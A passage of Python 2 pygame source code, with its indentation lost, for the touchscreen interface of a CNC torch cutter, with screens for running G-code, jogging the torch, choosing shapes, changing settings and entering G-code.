dstx,dsty,dscale=getscale(590,540)
get_stpz(dstx,dsty,dscale)
gdraw2(dstx,dsty,dscale,WHITE)
screenHome()
def screenHome():
#Home screen to salect basic options
global dstx,dsty,dscale
image_file = os.path.join(main_dir, 'data', 'home.png')
SIMAGE = pygame.image.load(image_file)
DISPLAYSURF.blit(SIMAGE, (0, 0))
BUTTON1 = (630,0,170,114)
BUTTON1s = [630,0,170,114]
BUTTON2 = (630,121,170,114)
BUTTON2s = [630,121,170,114]
BUTTON3 = (630,242,170,114)
BUTTON3s = [630,242,170,114]
BUTTON4 = (630,366,170,114)
BUTTON4s = [630,366,170,114]
BUTTON5 = (630,488,170,114)
BUTTON5s = [630,488,170,114]
screenNeedsRedraw = True
if XINV == True:
BUTTON1s[0] = WINDOWWIDTH - BUTTON1s[0] - BUTTON1s[2]
BUTTON2s[0] = WINDOWWIDTH - BUTTON2s[0] - BUTTON2s[2]
BUTTON3s[0] = WINDOWWIDTH - BUTTON3s[0] - BUTTON3s[2]
BUTTON4s[0] = WINDOWWIDTH - BUTTON4s[0] - BUTTON4s[2]
BUTTON5s[0] = WINDOWWIDTH - BUTTON5s[0] - BUTTON5s[2]
if YINV == True:
BUTTON1s[1] = WINDOWHEIGHT - BUTTON1s[1] - BUTTON1s[3]
BUTTON2s[1] = WINDOWHEIGHT - BUTTON2s[1] - BUTTON2s[3]
BUTTON3s[1] = WINDOWHEIGHT - BUTTON3s[1] - BUTTON3s[3]
BUTTON4s[1] = WINDOWHEIGHT - BUTTON4s[1] - BUTTON4s[3]
BUTTON5s[1] = WINDOWHEIGHT - BUTTON5s[1] - BUTTON5s[3]
#dstx,dsty,dscale=getscale(590,540)
#get_stpz(dstx,dsty,dscale)
print str(dstx)+", "+str(dsty)+", "+str(dscale)
gdraw2(dstx,dsty,dscale,WHITE)
while True:
if screenNeedsRedraw:
pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON1,2)
pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON2,2)
pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON3,2)
pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON4,2)
pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON5,2)
pygame.display.update()
FPSCLOCK.tick(300)
screenNeedsRedraw = False # by default, don't redraw the screen
event = pygame.event.wait()
if event.type == QUIT:
pygame.quit()
sys.exit()
elif event.type == KEYUP:
if event.key == K_ESCAPE:
pygame.quit()
sys.exit()
elif event.type == MOUSEBUTTONUP:
screenNeedsRedraw = True # screen should be redrawn
mousex, mousey = event.pos # syntactic sugar
# check for clicks on the difficulty buttons
if pygame.Rect((BUTTON1s)).collidepoint(mousex, mousey):
print 'HOME RUN'
screenRun()
pygame.draw.rect(DISPLAYSURF,COLOR_ON,BUTTON1,2)
elif pygame.Rect((BUTTON2s)).collidepoint(mousex, mousey):
print 'HOME SHAPES'
screenShapes()
pygame.draw.rect(DISPLAYSURF,COLOR_ON,BUTTON2,2)
elif pygame.Rect((BUTTON3s)).collidepoint(mousex, mousey):
print 'HOME SETUP'
screenSetup()
pygame.draw.rect(DISPLAYSURF,COLOR_ON,BUTTON3,2)
elif pygame.Rect((BUTTON4s)).collidepoint(mousex, mousey):
print 'HOME GCODE'
screenGcode()
pygame.draw.rect(DISPLAYSURF,COLOR_ON,BUTTON4,2)
elif pygame.Rect((BUTTON5s)).collidepoint(mousex, mousey):
print 'HOME USB'
screenUsb()
pygame.draw.rect(DISPLAYSURF,COLOR_ON,BUTTON5,2)
pygame.display.update()
def screenRun():
#Run screen to run Gcode
global difficulty, boxSize, boardWidth, boardHeight, maxLife, paletteColors, bgColor
global FDMAR
image_file = os.path.join(main_dir, 'data', 'run.png')
SIMAGE = pygame.image.load(image_file)
DISPLAYSURF.blit(SIMAGE, (0, 0))
BUTTON1 = (630,0,170,114)
BUTTON1s = [630,0,170,114]
BUTTON2 = (630,121,170,114)
BUTTON2s = [630,121,170,114]
BUTTON3 = (630,242,170,114)
BUTTON3s = [630,242,170,114]
BUTTON4 = (630,366,170,114)
BUTTON4s = [630,366,170,114]
BUTTON5 = (630,488,170,114)
BUTTON5s = [630,488,170,114]
screenNeedsRedraw = True
if XINV == True:
BUTTON1s[0] = WINDOWWIDTH - BUTTON1s[0] - BUTTON1s[2]
BUTTON2s[0] = WINDOWWIDTH - BUTTON2s[0] - BUTTON2s[2]
BUTTON3s[0] = WINDOWWIDTH - BUTTON3s[0] - BUTTON3s[2]
BUTTON4s[0] = WINDOWWIDTH - BUTTON4s[0] - BUTTON4s[2]
BUTTON5s[0] = WINDOWWIDTH - BUTTON5s[0] - BUTTON5s[2]
if YINV == True:
BUTTON1s[1] = WINDOWHEIGHT - BUTTON1s[1] - BUTTON1s[3]
BUTTON2s[1] = WINDOWHEIGHT - BUTTON2s[1] - BUTTON2s[3]
BUTTON3s[1] = WINDOWHEIGHT - BUTTON3s[1] - BUTTON3s[3]
BUTTON4s[1] = WINDOWHEIGHT - BUTTON4s[1] - BUTTON4s[3]
BUTTON5s[1] = WINDOWHEIGHT - BUTTON5s[1] - BUTTON5s[3]
gdraw2(dstx,dsty,dscale,WHITE)
spath = os.path.join(main_dir, "motion", "step1.txt" )
dpath = os.path.join(main_dir, "motion", "stepd.txt" )
cpsd = 'cp -f '+ spath + ' ' + dpath
os.system(cpsd)
linecache.checkcache(dpath)
while True:
if screenNeedsRedraw:
pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON1,2)
pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON2,2)
pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON3,2)
pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON4,2)
pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON5,2)
pygame.display.update()
FPSCLOCK.tick(300)
screenNeedsRedraw = False # by default, don't redraw the screen
if (FDMAR == True):
for num in range(1,10):
event = pygame.event.poll()
if event.type == MOUSEBUTTONUP:
break
time.delay(10)
else:
event = pygame.event.wait()
if event.type == QUIT:
pygame.quit()
sys.exit()
elif event.type == KEYUP:
if event.key == K_ESCAPE:
pygame.quit()
sys.exit()
elif event.type == MOUSEBUTTONUP:
screenNeedsRedraw = True # screen should be redrawn
mousex, mousey = event.pos # syntactic sugar
# check for clicks on the difficulty buttons
if pygame.Rect((BUTTON1s)).collidepoint(mousex, mousey):
print 'RUN HOME'
screenHome()
pygame.draw.rect(DISPLAYSURF,COLOR_ON,BUTTON1,2)
elif pygame.Rect((BUTTON2s)).collidepoint(mousex, mousey):
print 'RUN PLACE'
screenPlace()
pygame.draw.rect(DISPLAYSURF,COLOR_ON,BUTTON2,2)
elif pygame.Rect((BUTTON3s)).collidepoint(mousex, mousey):
dgdraw2.xoff=10.0;
dgdraw2.yoff=550.0;
print 'RUN START'
os.system("./intr_fdma.exe 8989&")
os.system('sudo ./fdma.exe 10000&') #TODO
FDMAR = True
time.delay(100)
update_tourch.ls=socket.socket()
update_tourch.ls.connect(('localhost',8989))
update_tourch.ls.sendall('Communication Start')
print 'fdma.exe is executed'
pygame.draw.rect(DISPLAYSURF,COLOR_ON,BUTTON3,2)
elif pygame.Rect((BUTTON4s)).collidepoint(mousex, mousey):
FDMAR = False
FDMAR=pause_tourch()
print 'RUN PAUSE'
pygame.draw.rect(DISPLAYSURF,COLOR_ON,BUTTON4,2)
elif pygame.Rect((BUTTON5s)).collidepoint(mousex, mousey):
#stop_tourch()
print 'RUN STOP'
time.delay(200)
update_tourch.ls.close()
time.delay(200)
os.system('sudo pkill fdma.exe') #TODO
os.system('sudo pkill intr_fdma.exe') #TODO
FDMAR = False
#update_tourch.ls.shutdown(socket.SHUT_RDWR)
pygame.draw.rect(DISPLAYSURF,COLOR_ON,BUTTON5,2)
screenHome()
pygame.display.update()
else:
if FDMAR == True :
FDMAR=update_tourch(dstx,dsty,dscale)
if (FDMAR == False):
update_tourch.ls.close()
def screenPlace():
#Place screen to place tourch
global difficulty, boxSize, boardWidth, boardHeight, maxLife, paletteColors, bgColor
image_file = os.path.join(main_dir, 'data', 'place.png')
SIMAGE = pygame.image.load(image_file)
DISPLAYSURF.blit(SIMAGE, (0, 0))
os.system('sudo ./place.exe&')
os.system("./intrcon.exe 8899 &")
time.delay(200)
#pi=pigpio.pi()
#os.system('sudo pigs m 18 w')
#pi.set_mode(18,pigpio.OUTPUT)
#pi.set_mode(23,pigpio.OUTPUT)
#pi.set_mode(24,pigpio.OUTPUT)
#pi.set_mode(25,pigpio.OUTPUT)
#os.system('sudo pigs m 23 w')
#os.system('sudo pigs m 24 w')
#os.system('sudo pigs m 25 w')
BUTTON1 = (630,0,170,114)
BUTTON1s = [630,0,170,114]
BUTTON2 = (630,121,170,114)
BUTTON2s = [630,121,170,114]
BUTTON3 = (630,242,170,114)
BUTTON3s = [630,242,170,114]
BUTTON4 = (630,366,170,114)
BUTTON4s = [630,366,170,114]
BUTTON5 = (630,488,170,114)
BUTTON5s = [630,488,170,114]
screenNeedsRedraw = True
if XINV == True:
BUTTON1s[0] = WINDOWWIDTH - BUTTON1s[0] - BUTTON1s[2]
BUTTON2s[0] = WINDOWWIDTH - BUTTON2s[0] - BUTTON2s[2]
BUTTON3s[0] = WINDOWWIDTH - BUTTON3s[0] - BUTTON3s[2]
BUTTON4s[0] = WINDOWWIDTH - BUTTON4s[0] - BUTTON4s[2]
BUTTON5s[0] = WINDOWWIDTH - BUTTON5s[0] - BUTTON5s[2]
if YINV == True:
BUTTON1s[1] = WINDOWHEIGHT - BUTTON1s[1] - BUTTON1s[3]
BUTTON2s[1] = WINDOWHEIGHT - BUTTON2s[1] - BUTTON2s[3]
BUTTON3s[1] = WINDOWHEIGHT - BUTTON3s[1] - BUTTON3s[3]
BUTTON4s[1] = WINDOWHEIGHT - BUTTON4s[1] - BUTTON4s[3]
BUTTON5s[1] = WINDOWHEIGHT - BUTTON5s[1] - BUTTON5s[3]
ls=socket.socket()
ls.connect(('localhost',8899))
ls.sendall('Communication Start')
while True:
if screenNeedsRedraw:
pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON1,2)
pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON2,2)
pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON3,2)
pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON4,2)
pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON5,2)
pygame.display.update()
FPSCLOCK.tick(300)
screenNeedsRedraw = False # by default, don't redraw the screen
event = pygame.event.wait()
if event.type == QUIT:
print 'QUIT'
pygame.quit()
sys.exit()
elif event.type == KEYUP:
if event.key == K_ESCAPE:
print 'QUIT'
pygame.quit()
sys.exit()
elif event.type == MOUSEBUTTONUP :
screenNeedsRedraw = True # screen should be redrawn
mousex, mousey = event.pos # syntactic sugar
#print pygame.mouse.get_pressed()
# check for clicks on the difficulty buttons
if pygame.Rect((BUTTON1s)).collidepoint(mousex, mousey):
ls.sendall('16')
time.delay(200)
ls.close()
print 'PLACE BACK'
screenRun()
pygame.draw.rect(DISPLAYSURF,COLOR_ON,BUTTON1,2)
elif pygame.mouse.get_pressed() == (1,0,0):
mousex, mousey = event.pos # syntactic sugar
if pygame.Rect((BUTTON2s)).collidepoint(mousex, mousey):
ls.sendall('1')
msg=ls.recv(2);
print 'CLIENT:' + msg
print 'PLACE UP'
pygame.draw.rect(DISPLAYSURF,COLOR_ON,BUTTON2,2)
elif pygame.Rect((BUTTON3s)).collidepoint(mousex, mousey):
ls.sendall('4')
msg=ls.recv(2);
print 'CLIENT:' + msg
print 'PLACE RIGHT'
pygame.draw.rect(DISPLAYSURF,COLOR_ON,BUTTON3,2)
elif pygame.Rect((BUTTON4s)).collidepoint(mousex, mousey):
ls.sendall('8')
msg=ls.recv(2);
print 'CLIENT:' + msg
print 'PLACE LEFT'
pygame.draw.rect(DISPLAYSURF,COLOR_ON,BUTTON4,2)
elif pygame.Rect((BUTTON5s)).collidepoint(mousex, mousey):
ls.sendall('2')
msg=ls.recv(2);
print 'CLIENT:' + msg
print 'PLACE DOWN'
pygame.draw.rect(DISPLAYSURF,COLOR_ON,BUTTON5,2)
else:
ls.sendall('0')
print 'PLACE DOWN'
pygame.display.update()
def screenShapes():
#Shapes screen to salect predefined shapes
global difficulty, boxSize, boardWidth, boardHeight, maxLife, paletteColors, bgColor
image_file = os.path.join(main_dir, 'data', 'shapes.png')
SIMAGE = pygame.image.load(image_file)
DISPLAYSURF.blit(SIMAGE, (0, 0))
#Circle
BUTTON1 = (19,18,142,142)
BUTTON1s = [19,18,142,142]
#Rectangle
BUTTON2 = (225,18,142,142)
BUTTON2s = [225,18,142,142]
#Star
BUTTON3 = (433,18,142,142)
BUTTON3s = [433,18,142,142]
#Blank
BUTTON4 = (638,18,142,142)
BUTTON4s = [638,18,142,142]
#Rhombus
BUTTON5 = (19,218,142,142)
BUTTON5s = [19,218,142,142]
#Triangle
BUTTON6 = (225,218,142,142)
BUTTON6s = [225,218,142,142]
#Polygon
BUTTON7 = (433,218,142,142)
BUTTON7s = [433,218,142,142]
#Blank
BUTTON8 = (638,218,142,142)
BUTTON8s = [638,218,142,142]
#Blank
BUTTON9 = (19,418,142,142)
BUTTON9s = [19,418,142,142]
#Blank
BUTTON10 = (225,418,142,142)
BUTTON10s = [225,418,142,142]
#Blank
BUTTON11 = (433,418,142,142)
BUTTON11s = [433,418,142,142]
#Cancel
BUTTON12 = (638,418,142,142)
BUTTON12s = [638,418,142,142]
screenNeedsRedraw = True
if XINV == True:
BUTTON1s[0] = WINDOWWIDTH - BUTTON1s[0] - BUTTON1s[2]
BUTTON2s[0] = WINDOWWIDTH - BUTTON2s[0] - BUTTON2s[2]
BUTTON3s[0] = WINDOWWIDTH - BUTTON3s[0] - BUTTON3s[2]
BUTTON4s[0] = WINDOWWIDTH - BUTTON4s[0] - BUTTON4s[2]
BUTTON5s[0] = WINDOWWIDTH - BUTTON5s[0] - BUTTON5s[2]
BUTTON6s[0] = WINDOWWIDTH - BUTTON6s[0] - BUTTON6s[2]
BUTTON7s[0] = WINDOWWIDTH - BUTTON7s[0] - BUTTON7s[2]
BUTTON8s[0] = WINDOWWIDTH - BUTTON8s[0] - BUTTON8s[2]
BUTTON9s[0] = WINDOWWIDTH - BUTTON9s[0] - BUTTON9s[2]
BUTTON10s[0] = WINDOWWIDTH - BUTTON10s[0] - BUTTON10s[2]
BUTTON11s[0] = WINDOWWIDTH - BUTTON11s[0] - BUTTON11s[2]
BUTTON12s[0] = WINDOWWIDTH - BUTTON12s[0] - BUTTON12s[2]
if YINV == True:
BUTTON1s[1] = WINDOWHEIGHT - BUTTON1s[1] - BUTTON1s[3]
BUTTON2s[1] = WINDOWHEIGHT - BUTTON2s[1] - BUTTON2s[3]
BUTTON3s[1] = WINDOWHEIGHT - BUTTON3s[1] - BUTTON3s[3]
BUTTON4s[1] = WINDOWHEIGHT - BUTTON4s[1] - BUTTON4s[3]
BUTTON5s[1] = WINDOWHEIGHT - BUTTON5s[1] - BUTTON5s[3]
BUTTON6s[1] = WINDOWHEIGHT - BUTTON6s[1] - BUTTON6s[3]
BUTTON7s[1] = WINDOWHEIGHT - BUTTON7s[1] - BUTTON7s[3]
BUTTON8s[1] = WINDOWHEIGHT - BUTTON8s[1] - BUTTON8s[3]
BUTTON9s[1] = WINDOWHEIGHT - BUTTON9s[1] - BUTTON9s[3]
BUTTON10s[1] = WINDOWHEIGHT - BUTTON10s[1] - BUTTON10s[3]
BUTTON11s[1] = WINDOWHEIGHT - BUTTON11s[1] - BUTTON11s[3]
BUTTON12s[1] = WINDOWHEIGHT - BUTTON12s[1] - BUTTON12s[3]
while True:
if screenNeedsRedraw:
pygame.display.update()
FPSCLOCK.tick(300)
screenNeedsRedraw = False # by default, don't redraw the screen
event = pygame.event.wait()
if event.type == QUIT:
pygame.quit()
sys.exit()
elif event.type == KEYUP:
if event.key == K_ESCAPE:
pygame.quit()
sys.exit()
elif event.type == MOUSEBUTTONUP:
screenNeedsRedraw = True # screen should be redrawn
mousex, mousey = event.pos # syntactic sugar
# check for clicks on the difficulty buttons
if pygame.Rect((BUTTON1s)).collidepoint(mousex, mousey):
print 'SHAPES CIRCLE'
screenSetsh('cir')
elif pygame.Rect((BUTTON2s)).collidepoint(mousex, mousey):
print 'SHAPES RECTANGLE'
screenSetsh('rec')
elif pygame.Rect((BUTTON3s)).collidepoint(mousex, mousey):
print 'SHAPES STAR'
screenSetsh('sta')
elif pygame.Rect((BUTTON4s)).collidepoint(mousex, mousey):
print 'SHAPES BLANK'
elif pygame.Rect((BUTTON5s)).collidepoint(mousex, mousey):
print 'SHAPES RHOMBUS'
screenSetsh('rho')
elif pygame.Rect((BUTTON6s)).collidepoint(mousex, mousey):
print 'SHAPES TRIANGLE'
screenSetsh('tri')
elif pygame.Rect((BUTTON7s)).collidepoint(mousex, mousey):
print 'SHAPES POLYGON'
screenSetsh('pol')
elif pygame.Rect((BUTTON8s)).collidepoint(mousex, mousey):
print 'SHAPES BLANK'
elif pygame.Rect((BUTTON9s)).collidepoint(mousex, mousey):
print 'SHAPES BLANK'
elif pygame.Rect((BUTTON10s)).collidepoint(mousex, mousey):
print 'SHAPES BLANK'
elif pygame.Rect((BUTTON11s)).collidepoint(mousex, mousey):
print 'SHAPES BLANK'
elif pygame.Rect((BUTTON12s)).collidepoint(mousex, mousey):
print 'SHAPES CANCEL'
screenHome()
pygame.display.update()
def screenSetup():
#Setup screen change settings
global difficulty, boxSize, boardWidth, boardHeight, maxLife, paletteColors, bgColor
image_file = os.path.join(main_dir, 'data', 'setup.png')
SIMAGE = pygame.image.load(image_file)
DISPLAYSURF.blit(SIMAGE, (0, 0))
BUTTON1 = (630,0,170,114)
BUTTON1s = [630,0,170,114]
BUTTON2 = (630,121,170,114)
BUTTON2s = [630,121,170,114]
BUTTON3 = (630,242,170,114)
BUTTON3s = [630,242,170,114]
BUTTON4 = (630,366,170,114)
BUTTON4s = [630,366,170,114]
BUTTON5 = (630,488,170,114)
BUTTON5s = [630,488,170,114]
screenNeedsRedraw = True
if XINV == True:
BUTTON1s[0] = WINDOWWIDTH - BUTTON1s[0] - BUTTON1s[2]
BUTTON2s[0] = WINDOWWIDTH - BUTTON2s[0] - BUTTON2s[2]
BUTTON3s[0] = WINDOWWIDTH - BUTTON3s[0] - BUTTON3s[2]
BUTTON4s[0] = WINDOWWIDTH - BUTTON4s[0] - BUTTON4s[2]
BUTTON5s[0] = WINDOWWIDTH - BUTTON5s[0] - BUTTON5s[2]
if YINV == True:
BUTTON1s[1] = WINDOWHEIGHT - BUTTON1s[1] - BUTTON1s[3]
BUTTON2s[1] = WINDOWHEIGHT - BUTTON2s[1] - BUTTON2s[3]
BUTTON3s[1] = WINDOWHEIGHT - BUTTON3s[1] - BUTTON3s[3]
BUTTON4s[1] = WINDOWHEIGHT - BUTTON4s[1] - BUTTON4s[3]
BUTTON5s[1] = WINDOWHEIGHT - BUTTON5s[1] - BUTTON5s[3]
setting = getset()
set4 = ['mm', 'inch']
colbac=[ABLUE, 'NO', 'NO', 'NO', 'NO']
selset = 0
setrMx=[23, 23, 15, 15, 1]
setrMn=[0, 0, 0, 0, 0]
showtext(DISPLAYSURF, (440, 30), setting[0], COLOR_OFF, 'NO')
showtext(DISPLAYSURF, (440,100), setting[1], COLOR_OFF, colbac[1])
showtext(DISPLAYSURF, (440,170), setting[2], COLOR_OFF, colbac[2])
showtext(DISPLAYSURF, (440,240), setting[3], COLOR_OFF, colbac[3])
showtext(DISPLAYSURF, (440,310), set4[int(setting[4])], COLOR_OFF, colbac[4])
while True:
if screenNeedsRedraw:
pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON1,2)
pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON2,2)
pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON3,2)
pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON4,2)
pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON5,2)
pygame.display.update()
FPSCLOCK.tick(300)
screenNeedsRedraw = False # by default, don't redraw the screen
event = pygame.event.wait()
if event.type == QUIT:
pygame.quit()
sys.exit()
elif event.type == KEYUP:
if event.key == K_ESCAPE:
pygame.quit()
sys.exit()
elif event.type == MOUSEBUTTONUP:
screenNeedsRedraw = True # screen should be redrawn
mousex, mousey = event.pos # syntactic sugar
# check for clicks on the difficulty buttons
if pygame.Rect((BUTTON1s)).collidepoint(mousex, mousey):
colbac[selset]='NO'
if(selset==0):
selset=5
selset-=1;
colbac[selset]=ABLUE
DISPLAYSURF.blit(SIMAGE, (0, 0))
print 'SETUP UP'
elif pygame.Rect((BUTTON2s)).collidepoint(mousex, mousey):
if(int(setting[selset])<setrMx[selset]):
setting[selset]=str(int(setting[selset])+1);
print 'SETUP ADD'
elif pygame.Rect((BUTTON3s)).collidepoint(mousex, mousey):
if(int(setting[selset])>setrMn[selset]):
setting[selset]=str(int(setting[selset])-1);
print 'SETUP SUB'
elif pygame.Rect((BUTTON4s)).collidepoint(mousex, mousey):
colbac[selset]='NO'
if(selset==4):
selset=-1
selset+=1;
colbac[selset]=ABLUE
DISPLAYSURF.blit(SIMAGE, (0, 0))
print 'SETUP DOWN'
elif pygame.Rect((BUTTON5s)).collidepoint(mousex, mousey):
printset(setting)
os.system('g++ -I . gdecode.cpp -o gdecode.exe')
print 'SETUP DONE'
screenHome()
#setting[0]=str(int(setting[0])+1);
pygame.draw.rect(DISPLAYSURF,ABLUE,(362,21+71*selset,243,36),0)
showtext(DISPLAYSURF, (440, 30), setting[0], COLOR_OFF, colbac[0])
showtext(DISPLAYSURF, (440,100), setting[1], COLOR_OFF, colbac[1])
showtext(DISPLAYSURF, (440,170), setting[2], COLOR_OFF, colbac[2])
showtext(DISPLAYSURF, (440,240), setting[3], COLOR_OFF, colbac[3])
showtext(DISPLAYSURF, (440,310), set4[int(setting[4])], COLOR_OFF, colbac[4])
pygame.display.update()
def screenGcode():
#Gcode screen to creat custom gcode
global difficulty, boxSize, boardWidth, boardHeight, maxLife, paletteColors, bgColor
image_file = os.path.join(main_dir, 'data', 'gcode.png')
SIMAGE = pygame.image.load(image_file)
DISPLAYSURF.blit(SIMAGE, (0, 0))
#X
BUTTON1s = [9,365,96,74]
#I
BUTTON2s = [112,365,96,74]
#1
BUTTON3s = [216,365,96,74]
#2
BUTTON4s = [320,365,96,74]
#3
BUTTON5s = [423,365,96,74]
#0
BUTTON6s = [527,365,96,74]
#Y
BUTTON7s = [9,446,96,74]
#J
BUTTON8s = [112,446,96,74]
#4
BUTTON9s = [216,446,96,74]
#5
BUTTON10s = [320,446,96,74]
#6
BUTTON11s = [423,446,96,74]
#.
BUTTON12s = [527,446,96,74]
#Z
BUTTON13s = [9,525,96,74]
#K
BUTTON14s = [112,525,96,74]
#7
BUTTON15s = [216,525,96,74]
#8
BUTTON16s = [320,525,96,74]
#9
BUTTON17s = [423,525,96,74]
#-
BUTTON18s = [527,525,96,74]
#Next
BUTTON19s = [630,365,170,114]
#Done
BUTTON20s = [630,487,170,114]
screenNeedsRedraw = True
if XINV == True:
BUTTON1s[0] = WINDOWWIDTH - BUTTON1s[0] - BUTTON1s[2]
BUTTON2s[0] = WINDOWWIDTH - BUTTON2s[0] - BUTTON2s[2]
BUTTON3s[0] = WINDOWWIDTH - BUTTON3s[0] - BUTTON3s[2]
BUTTON4s[0] = WINDOWWIDTH - BUTTON4s[0] - BUTTON4s[2]
BUTTON5s[0] = WINDOWWIDTH - BUTTON5s[0] - BUTTON5s[2]
BUTTON6s[0] = WINDOWWIDTH - BUTTON6s[0] - BUTTON6s[2]
BUTTON7s[0] = WINDOWWIDTH - BUTTON7s[0] - BUTTON7s[2]
BUTTON8s[0] = WINDOWWIDTH - BUTTON8s[0] - BUTTON8s[2]
BUTTON9s[0] = WINDOWWIDTH - BUTTON9s[0] - BUTTON9s[2]
BUTTON10s[0] = WINDOWWIDTH - BUTTON10s[0] - BUTTON10s[2]
BUTTON11s[0] = WINDOWWIDTH - BUTTON11s[0] - BUTTON11s[2]
BUTTON12s[0] = WINDOWWIDTH - BUTTON12s[0] - BUTTON12s[2]
BUTTON13s[0] = WINDOWWIDTH - BUTTON13s[0] - BUTTON13s[2]
BUTTON14s[0] = WINDOWWIDTH - BUTTON14s[0] - BUTTON14s[2]
BUTTON15s[0] = WINDOWWIDTH - BUTTON15s[0] - BUTTON15s[2]
BUTTON16s[0] = WINDOWWIDTH - BUTTON16s[0] - BUTTON16s[2]
BUTTON17s[0] = WINDOWWIDTH - BUTTON17s[0] - BUTTON17s[2]
BUTTON18s[0] = WINDOWWIDTH - BUTTON18s[0] - BUTTON18s[2]
BUTTON19s[0] = WINDOWWIDTH - BUTTON19s[0] - BUTTON19s[2]
BUTTON20s[0] = WINDOWWIDTH - BUTTON20s[0] - BUTTON20s[2]
if YINV == True:
BUTTON1s[1] = WINDOWHEIGHT - BUTTON1s[1] - BUTTON1s[3]
BUTTON2s[1] = WINDOWHEIGHT - BUTTON2s[1] - BUTTON2s[3]
BUTTON3s[1] = WINDOWHEIGHT - BUTTON3s[1] - BUTTON3s[3]
BUTTON4s[1] = WINDOWHEIGHT - BUTTON4s[1] - BUTTON4s[3]
BUTTON5s[1] = WINDOWHEIGHT - BUTTON5s[1] - BUTTON5s[3]
BUTTON6s[1] = WINDOWHEIGHT - BUTTON6s[1] - BUTTON6s[3]
BUTTON7s[1] = WINDOWHEIGHT - BUTTON7s[1] - BUTTON7s[3]
BUTTON8s[1] = WINDOWHEIGHT - BUTTON8s[1] - BUTTON8s[3]
BUTTON9s[1] = WINDOWHEIGHT - BUTTON9s[1] - BUTTON9s[3]
BUTTON10s[1] = WINDOWHEIGHT - BUTTON10s[1] - BUTTON10s[3]
BUTTON11s[1] = WINDOWHEIGHT - BUTTON11s[1] - BUTTON11s[3]
BUTTON12s[1] = WINDOWHEIGHT - BUTTON12s[1] - BUTTON12s[3]
BUTTON13s[1] = WINDOWHEIGHT - BUTTON13s[1] - BUTTON13s[3]
BUTTON14s[1] = WINDOWHEIGHT - BUTTON14s[1] - BUTTON14s[3]
BUTTON15s[1] = WINDOWHEIGHT - BUTTON15s[1] - BUTTON15s[3]
BUTTON16s[1] = WINDOWHEIGHT - BUTTON16s[1] - BUTTON16s[3]
BUTTON17s[1] = WINDOWHEIGHT - BUTTON17s[1] - BUTTON17s[3]
BUTTON18s[1] = WINDOWHEIGHT - BUTTON18s[1] - BUTTON18s[3]
BUTTON19s[1] = WINDOWHEIGHT - BUTTON19s[1] - BUTTON19s[3]
BUTTON20s[1] = WINDOWHEIGHT - BUTTON20s[1] - BUTTON20s[3]
wpath = os.path.join(main_dir, "gcode", "wgcode.txt" )
gpath = os.path.join(main_dir, "gcode", "gcode.txt" )
cpwg = 'cp '+ wpath + ' ' + gpath
os.system("rm -f ./gcode/wgcode.txt")
gline="G"
showtextr(DISPLAYSURF, (30, 300), 0, gline, COLOR_OFF, ABLUE)
while True:
if screenNeedsRedraw:
pygame.display.update()
FPSCLOCK.tick(300)
screenNeedsRedraw = False # by default, don't redraw the screen
event = pygame.event.wait()
if event.type == QUIT:
pygame.quit()
sys.exit()
elif event.type == KEYUP:
if event.key == K_ESCAPE:
pygame.quit()
sys.exit()
elif event.type == MOUSEBUTTONUP:
screenNeedsRedraw = True # screen should be redrawn
mousex, mousey = event.pos # syntactic sugar
# check for clicks on the difficulty buttons
if pygame.Rect((BUTTON1s)).collidepoint(mousex, mousey):
gline+=' X'
print 'GCODE X'
elif pygame.Rect((BUTTON2s)).collidepoint(mousex, mousey):
gline+=' I'
print 'GCODE I'
elif pygame.Rect((BUTTON3s)).collidepoint(mousex, mousey):
gline+='1'
print 'GCODE 1'
elif pygame.Rect((BUTTON4s)).collidepoint(mousex, mousey):
gline+='2'
print 'GCODE 2'
elif pygame.Rect((BUTTON5s)).collidepoint(mousex, mousey):
gline+='3'
print 'GCODE 3'
elif pygame.Rect((BUTTON6s)).collidepoint(mousex, mousey):
gline+='0'
print 'GCODE 0'
elif pygame.Rect((BUTTON7s)).collidepoint(mousex, mousey):
gline+=' Y'
print 'GCODE Y'
elif pygame.Rect((BUTTON8s)).collidepoint(mousex, mousey):
gline+=' J'
print 'GCODE J'
elif pygame.Rect((BUTTON9s)).collidepoint(mousex, mousey):
gline+='4'
print 'GCODE 4'
elif pygame.Rect((BUTTON10s)).collidepoint(mousex, mousey):
gline+='5'
print 'GCODE 5'
elif pygame.Rect((BUTTON11s)).collidepoint(mousex, mousey):
gline+='6'
print 'GCODE 6'
elif pygame.Rect((BUTTON12s)).collidepoint(mousex, mousey):
gline+='.'
print 'GCODE .'
elif pygame.Rect((BUTTON13s)).collidepoint(mousex, mousey):
gline+=' Z'
print 'GCODE Z'
elif pygame.Rect((BUTTON14s)).collidepoint(mousex, mousey):
gline+=' K'
print 'GCODE K'
elif pygame.Rect((BUTTON15s)).collidepoint(mousex, mousey):
gline+='7'
print 'GCODE 7'
elif pygame.Rect((BUTTON16s)).collidepoint(mousex, mousey):
gline+='8'
print 'GCODE 8'
elif pygame.Rect((BUTTON17s)).collidepoint(mousex, mousey):
gline+='9'
print 'GCODE 9'
elif pygame.Rect((BUTTON18s)).collidepoint(mousex, mousey):
gline+='-'
print 'GCODE -'
elif pygame.Rect((BUTTON19s)).collidepoint(mousex, mousey):
gline+='\n'
wline(wpath, gline)
gline="G"
filelines(30, 50, wpath, 0, 10, 45, 0)
showtextr(DISPLAYSURF, (30, 300), 0, " ", COLOR_OFF, ABLUE)
print 'GCODE NEXT'
elif pygame.Rect((BUTTON20s)).collidepoint(mousex, mousey):
